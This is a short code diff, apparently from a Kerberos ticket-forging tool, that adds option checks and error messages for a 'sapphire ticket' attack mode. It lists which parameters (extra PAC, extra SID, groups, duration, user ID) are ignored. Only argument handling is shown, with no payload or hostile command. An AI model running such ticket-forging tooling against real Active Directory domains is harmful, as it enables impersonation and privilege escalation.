+        if options.extra_pac: ignored_params.append("-extra-pac")
+        if options.extra_sid is not None: ignored_params.append("-extra-sid")
+        if options.groups is not None: ignored_params.append("-groups")
+        if options.duration is not None: ignored_params.append("-duration")
+        if ignored_params:
+            logging.error(f"doing sapphire ticket, ignoring following parameters : {', '.join(ignored_params)}")
+        if options.old_pac and options.user_id is not None:
+            logging.error(f"parameter -user-id will be ignored when specifying -old-pac in a sapphire ticket attack")
+
     try:
         executer = TICKETER(options.target, password, options.domain, options)
         executer.run()
